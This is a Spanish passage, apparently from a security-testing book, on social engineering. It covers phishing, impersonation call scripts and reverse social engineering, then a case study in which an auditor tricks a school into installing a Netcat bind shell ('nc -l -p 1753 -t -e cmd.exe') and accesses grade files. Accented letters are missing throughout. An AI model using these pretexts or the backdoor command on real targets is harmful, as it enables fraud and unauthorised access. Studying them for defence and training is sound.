Si se prefiere, puede registrar un sitio con un sondeo similar ttulo. Por ejemplo, usted puede enviar a los usuarios http://WWW.YAH00.COM. A primera vista, esto parece como el sitio web gestionado por Yahoo. Basta con darle un vistazo ms de cerca, sin embargo, se puede ver que est utilizando en ceros y el nombre no es el popular portal de Internet Yahoo. Este proceso de envo de e-mails que piden los receptores ir a sitios web falsos se llama phishing. Es difcil protegerse contra el phishing. La mayor parte del tiempo fraudes electrnicos se envan a casa de clientes. Lamentablemente, a pesar de que la empresa original no se hace responsable de la estafa, causa mala publicidad y puede resultar en una disminucin del nmero de clientes. La mejor defensa para un sitio web es publicar las advertencias de tales fraudes en el mismo sitio Internet para educar a los clientes de su existencia. Un segundo tipo de ataque con e-mail es enviar archivos adjuntos de malware. Malware es software malicioso como virus o troyanos. El asunto del e-mail debe contener algo que llame la atencin del destinatario. En el pasado, los virus fueron enviados con mensajes que contenan ttulos como "Te quiero" o "imagen de Anna Kournikova Desnuda". Como resultado el receptor inicia el archivo adjunto y se propaga el virus o se instala o un Troyano.
Nota: Un programa troyano es una pequea aplicacin de software malicioso que viene disfrazado como algo til. El nombre de "caballo de Troya" proviene de la historia de la guerra de Troya, cuando los griegos fueron capaces de conquistar la ciudad protegida de Troya ocultndose en un gigantesco caballo que se le ofreci como regalo al rey de Troya.

Una popular virus, llamado virus de la NakedWife, se propagaba por e-mail con titulo de asunto que

deca "NakedWife" y el cuerpo de texto de lectura, "Mi esposa nunca se vera as :-)." Tras la apertura del archivo adjunto, un virus sera instalado que iniciara la eliminacin de archivos del disco duro del receptor. A continuacin, se enviar a s mismo en los contactos de la Libreta de direcciones de Outlook. Esto, a su vez, hara ver como remitente al receptor del virus de manera que cuando la prxima persona que reciba el e-mail, vera venir de un origen de alguien conocido, como un amigo o contacto comercial. Otra estafa es informar a alguien que ha ganado un premio. Aunque esto puede hacerse va e-mail, muchos son escpticos de estos tipos de mensajes de correo electrnico. Por el contrario, si enva el mensaje a travs de correo postal, utilizando un papel con membrete, la mayora de las personas creen. Se incluye en el mensaje un sitio web o direccin de correo electrnico que el destinatario necesita ponerse en contacto para reclamar el premio, enviando su nombre, direccin y nmero de tarjeta de crdito para pagar el envo y recibir el premio. Mediante el envo de "phishing" e-mails u otros tipos de mensajes de estafa, se pueden evaluar si los empleados de una organizacin son conscientes de esas tcticas y la forma en que estn respondiendo a ellos. La suplantacin del usuario final Se puede tratar de suplantar la identidad de un usuario final llamando a la mesa de ayuda. En el caso que se tenga acceso a un ordenador dentro de una empresa puede verse que cuando arranca el ordenador, por lo general le proporciona el nombre de usuario de la ltima persona que lo utilizo. A continuacin, se prueban varias contraseas, esto normalmente bloquea la cuenta y le obliga a ser bloqueados por un administrador de sistemas. Llamando a la mesa de ayuda y actuado como si fuese ese usuario. Se puede decir a la persona de TI que se le olvid su contrasea y usted ha bloqueado. A continuacin, abren su cuenta y le proporciona una nueva contrasea. Ahora puede conectarse a la red como ese usuario. La suplantacin del cliente Imagine este escenario de una prueba llamando a un centro de atencin al cliente de tarjeta de crdito:
Auditor: S, estoy llamando para comprobar el saldo de mi tarjeta de crdito. Victima: Claro, cul es su nmero de cuenta? Auditor: Lo siento, pero no lo tengo en este momento. No obstante tengo mi direccin. (Usted puede descubrir fcilmente esto a travs de una gua telefnica.) Victima: Sin su nmero de cuenta, no puedo buscar la informacin de su cuenta. Auditor: Por favor, es mi quinto aniversario de boda, y mi esposa est en el hospital. Tena la esperanza que despus de trabajar podra comprarle algo especial, pero no estoy seguro de tener suficiente dinero disponible mi cuenta. Podra usted por favor solo decirme cuanto es mi saldo? Victima: Est bien. Cul es su direccin? Despus de informarle el saldo, la conversacin sigue: Auditor: Sabe qu? Creo que puedo ordenar algo en lnea y entregarlo hoy como una sorpresa. Oh no!, pero este momento no tengo mi nmero de cuenta. Podra leerme mi nmero de cuenta? Victima: Claro, es...

La mayora de sus ms grandes compaas de tarjetas de crdito no corresponden a esto. Una de

las razones por las que no entran por este simple truco es porque realizan pruebas de ingeniera social a todo su personal que puedan ser sensibles a estas tcnicas de persuasin. Se debe hacer cumplir estrictamente las sanciones en contra de empleados que dar a conocer la informacin de los clientes sin comprobar la identidad de la persona que llama. Las Empresas que utilizan los centros de servicio al cliente deben tener estrictas polticas de no dar jams informacin de los clientes sin identificar y verificacin la llamada y, a continuacin, slo ofrecer informacin limitada. Deben tener una poltica similar para el intercambio de informacin dentro de la empresa. Ingeniera social inversa Ingeniera inversa es un poco ms complicada que los ejemplos anteriores, pero es eficaz. Revertir la ingeniera social (RSE) se compone de tres pasos: 1. Sabotaje 2. Publicidad 3. Soporte En la ingeniera inversa, los papeles se invierten. Aqu, en lugar de llamar para solicitar ayuda como en los ejemplos anteriores, el atacante obtiene que los usuarios llamen a l en busca de ayuda. Usted comienza por sabotear una red, quizs con una denegacin de servicio (DoS) ataque. Luego de anunciar los servicios de su compaa como ingeniero de seguridad de red que se especializa en asegurar contra ataques de DoS. Tras la empresa emplea sus servicios, usted comienza a ofrecer apoyo y solucionar el problema, al tiempo que la instala aplicaciones de puerta trasera que le permiten tener acceso a la red en una fecha posterior.

La proteccin contra la ingeniera social Ciertos tipos de empresas son ms susceptibles a estos tipos de ataques que otras. Entre ellos figuran los siguientes: Las grandes empresas - si la empresa es ms pequeas es mas fcil conocer a sus empleados y ser conscientes de que si alguien fuera de su organizacin esta realizando snooping alrededor de su edificio. Por tal motivo en una gran empresa esto es un inconveniente. Las empresas con usuarios remotos - tele trabajadores y los usuarios mviles son ms propensos a ser engaados porque no suelen comprobar la identidad del llamante. Las empresas que listan informacin completa de contactos en su sitio web - incluyen correo electrnico, esta informacin es muy valiosa para un ingeniero social porque es el primer paso hacia la realizacin de estafa exitosa. Las empresas que utilizan agencias temporales de recepcionistas los recepcionistas son mucho ms que solo saludar a las personas que ingresan en una empresa y que responden a los telfonos. Se trata de la primera lnea de defensa contra la ingeniera social. Las empresas que utilizan las recepcionistas temporales, estn en riesgo debido a su frecuente rotacin y carecen de la capacidad para detectar fraudes de ingeniera social, por motivos tales como no conocer las polticas de

seguridad de la empresa y no llegar a identificar a todo el personal que puede circular por el lugar. Las empresas con Call Centers - los centros de servicio al cliente son los principales candidatos para los ingenieros sociales que buscan descubrir informacin. La mejor defensa contra las tcnicas de ingeniera social es la formacin. Se debe entrenar a los empleados en las tcticas de ingeniera social y enviar peridicamente notificaciones de fraudes para que tengan conocimiento de las posibles clases de tcnicas a las que se pueden enfrentar. Ofrecer una formacin complementaria para recepcionistas, personal de Help Desk, y representantes de servicio de atencin al cliente porque son ms propensos a ser vctimas de ataques de ingeniera social. Se debe ensear al personal a verificar la identidad de las personas que llaman. En efecto, el personal debe realizar su propia ingeniera social, donde deber intentar descubrir la identidad de una persona sospechosa de ser un ingeniero social, dando como resultado la captura del ingeniero social o detener el intento de que obtenga informacin. La prevencin contra dumpster divers que puedan descubrir informacin sensible, se logra estableciendo polticas sobre cmo la informacin y los archivos deben ser eliminados. Por lo general, esto es a travs de trituradoras de papel o incineradoras.
Nota: Sin lugar a dudas, el ms famoso ingeniero social es Kevin Mitnick. l escribi un libro con el coautor William Simon titulado The Art of Deception: Controlling the Human Element of Security. Es un excelente recurso si est buscando informacin adicional o ejemplos de ingeniera social.

Caso de Estudio En este Caso de Estudio, un Auditor llamado Jimmy es contratado para realizar ingeniera social contra una escuela primaria pblica. El objetivo es tener acceso a los sistemas escolares a cambiar las calificaciones de los estudiantes. El primer paso es averiguar qu tipo de software de calificacin utiliza la escuela. Jimmy comienza haciendo investigacin en Internet para averiguar un software comn de calificacin. Descubre productos como Gradebook, AutoGrade, Grado Genie, ThinkWave, Next5 Grading. Jimmy tambin navega por sitios con mensajes educativos como el de familyeducation.com que discute el uso de la tecnologa en las escuelas. Explorando la zona, Jimmy descubre informacin acerca de una escuela primaria llamada Washington Elementary (simulara que trabaja en la misma). Este conocimiento ayuda a Jimmy a realizar llamadas telefnicas al lugar. Jimmy llama a la escuela objetivo y pide hablar con la persona encargada de la tecnologa. l est conectado con un seor llamado Chris. La conversacin es la siguiente:
Jimmy: Hola, Chris? Mi nombre es Jimmy, y estoy en la escuela Washington Elementary. Acabo de recibir la responsabilidad sobre la tecnologa de la escuela, pero, para ser sinceros, no s mucho acerca de la tecnologa, por lo que me preguntaba si usted podra ayudarme.

En este punto, Jimmy ha establecido la necesidad. Porque lo general la gente tiende a ayudar a los dems al ver alguien necesitado, Jimmy sabe que Chris probablemente estar encantado de ayudarle.

Chris: Hola, Jimmy asi que usted tiene ahora a cargo la escuela Washington, Qu pas con Kathy? Yo pensaba que ella estaba a cargo de la tecnologa all. Jimmy: S, ella todava supervisa la gestin, pero ahora se est ampliando su funcin. Yo trabajo directamente con ella. Ella es una gran persona para trabajar.

A pesar de que parece que Jimmy podra haber sido descubierto, juega fuera diciendo que Kathy fue promovida. Jimmy tambin hace un comentario positivo sobre Kathy para hacer la conversacin ms ligera.
Jimmy: De todos modos, Kathy me ha pedido que presente un nuevo software de calificacin. He estado buscando a Gradebook, AutoGrade, Grado y Genie, pero no estoy seguro de cual es ms flexible. Cul podra ser?

Jimmy demuestra su conocimiento de software de calificacin para eliminar cualquier duda de sus antecedentes en materia de educacin. Luego pide a Chris cual es el software ms flexible.
Chris: Hemos estado utilizando Gradebook. Estamos muy satisfechos con el.

Desde este punto, Jimmy procede a hacer preguntas sobre el software basado en preguntas similares que ha ledo en el sitio web educativo. Cuando la conversacin ha terminado, ahora Jimmy conoce el tipo de software utilizado por la escuela y el nombre de la persona a cargo de la tecnologa es Chris de la escuela objetivo. Para la prxima fase, Jimmy elige a alguien ms que contacte con Chris porque l reconocera la voz de Jimmy. Porque Chris es un hombre, y la mejor ingeniera social son con gente del sexo opuesto, Jimmy pide a Janet una compaera de trabajo para realizar una llamada telefnica y actuar como un representante de servicio de ThinkWave. Janet espera un par de semanas antes de comunicarse con Chris para que no parezca demasiado sospechoso.
Janet: Buen dia, Soy Janet de ThinkWave Software Technology. Nos preguntamos si le gustara participar en nuestro programa de mejoramiento de clientes. Como incentivo, usted recibe el 20 por ciento de descuentos en futuras actualizaciones.

Puesto que la mayora de las escuelas pblicas estn luchando por dinero, se trata de que seguro Chris se vera motivado por el ahorro de dinero.
Chris: Claro. Qu tengo que hacer? Janet: Bueno, se le enviar un programa informtico para poner en su servidor. Incluido con esto tendra las instrucciones sobre cmo configurarlo. En cualquier momento que aparece un mensaje de error, un informe generado sera enviado de vuelta a nosotros. Ninguna informacin personal ser enviada, slo el tipo de ordenador, cuando pas, y qu procesos se ejecutaron cuando se produjo el error. Mediante la recopilacin de esos informes de nuestros clientes, esperamos aliviar los errores de software en las versiones futuras. Chris: Suena bien!

Despus de esta conversacin, Jimmy descargas el logo del sitio web de ThinkWave y crea un membrete con el logo. Jimmy enva a la dirccion de la escuela un paquete a Chris con una direccin de retorno de ThinkWave. El paquete contiene un CD con la utilidad Netcat y una carta que dice lo siguiente:
Estimado Chris, Gracias por su participacin en nuestro programa de mejoramiento de los clientes. Estamos seguros de que nos ayudar a mejorar futuras versiones de nuestro producto. Incluido con esta carta esta adjunto un CD que contiene un programa informtico. En cualquier momento que se produzca un error, un informe que ser generado y enviado de vuelta a nosotros.

Quiero asegurarles que los datos personales no sern enviados. Para poner en marcha este programa de presentacin de informes, inserte el CD en la unidad de CD-ROM de su servidor. El programa tiene inicio automtico de instalacin. Si no, ir a la raz de la unidad de CD-ROM e iniciar setup.exe. Este programa informtico usa el puerto TCP 1753. Tendr que abrir este puerto en el Firewall. Consulte a su Firewall documentacin sobre la forma de dar permiso al puerto. Al inscribirse en este programa, recibir automticamente un 20 por ciento frente a futuras actualizaciones. Le agradecemos que nos halla elegido y estaremos encantados de atenderle en el futuro. Atentamente, Janet Smith Representante de Soporte ThinkWave "Donde los profesores, estudiantes y padres se comunican"

En el CD tiene una utilidad de configuracin que Jimmy ha creado con Netcat que se instala en la raz del disco duro del servidor. Netcat es una aplicacin backdoor Trojan que proporciona a Jimmy acceso remoto en el servidor. El script de instalacin se inicia el Netcat con los siguientes parmetros:
C:\nc -l -p 1753 -t -e cmd.exe

La -l dice a Netcat que entre en modo de escucha. El-p 1753 le dice a Netcat que escuche por el puerto 1753. El -t le dice a Netcat que escuche las peticiones de Telnet, y -e cmd.exe le dice a Netcat que puede abrir un shell de comandos. Despus de un par de das, Janet llama a Chris.
Janet: Hola soy Janet. Mi llamada es para ver si tuvo algn problema en la instalacin de nuestro software. Chris: No, ninguno en absoluto. Janet: Maravillosa. Eso es lo que nos gusta escuchar. Ahora slo necesitamos saber su direccin IP externa a fin de que cuando recibimos los informes, sabemos que est viniendo de usted. Chris: Claro. Permtame que cheque. Bueno, la direccin IP es 200.100.50.25. Janet: Gracias! Si alguna vez necesitan algo, no dude en llamarnos. Tiene usted todo nuestro apoyo. Chris: muy bien, muchas gracias.

Jimmy ya ha examinado el nmero de telfono a fin de que Janet salga por otro nmero diferente para evitar sospechas y parezca mas legitimo ante Chris. Ahora es el momento para intentar el acceso. Jimmy va a su ordenador y realiza lo siguientes:
C:\> nc 200.100.50.25 1753

Este comando intenta abrir una conexin con el servidor de la escuela en el puerto 1753, cuando Jimmy ha tenido acceso en el servidor, ejecuta un listado de directorio
C:\>dir Volume in drive C has no label. Volume Serial Number is 8496-8025 Directory of C:\ 06/01/2004 04:11 PM <DIR> ThinkWave

04/14/2004 03:11 PM 04/14/2004 07:43 AM <output removed>

<DIR

WINNT 0 AUTOEXEC.BAT

Jimmy ahora tiene pleno acceso al servidor de la escuela. l comienza a navegar los archivos del software de Calificacion y copias los datos a su computadora local. Jimmy registros todo el proceso de captura y agrega capturas de pantalla para realizar su informe ms tarde. Jimmy ve a uno de los ficheros llamado 010521.edt, utilizando un editor de texto descubre que es el archivo de calificaciones de un estudiante:
010521 Ciencias 010521 Matemticas A B

010521 Educacin Fsica A

Con slo un par de llamadas telefnicas y un rpido comando de una herramienta, Jimmy era capaz de acceder al servidor de la escuela, donde se encontraban las calificaciones de todos los estudiantes.

Resumen No importa cunta tecnologa de seguridad invierta una empresa, todava se es vulnerable a la ingeniera social. La Ingeniera social puede llevarse a cabo mediante el uso de computadoras, como el correo electrnico, por telfono o en persona. La psicologa social define siete tipos de tcnicas de persuasin: Basada en la conformidad Basada en la lgica Basada en la necesidad Basada en la autoridad Basada en la reciprocidad Basada en la similitud Basada en la informacin

Para tener xito en la ingeniera social, usted debe poseer paciencia y confianza. Crear un clima de confianza con su objetivo personal, y tener un buen conocimiento de la empresa objetivo. Las tcticas ms comunes en la ingeniera social son los siguientes: Suplantacin de tcnicos soporte

Suplantacin con participacin de terceros Suplantacin por E-mail Suplantacin de usuario final Suplantacin del cliente Ingeniera social inversa

La mejor defensa contra los ataques de ingeniera social es la formacin. Recepcionistas, personal de Help Desk, Call Center y los empleados deben recibir formacin adicional porque son ms propensos que otros a ser vctimas de ataques de ingeniera social.

chakan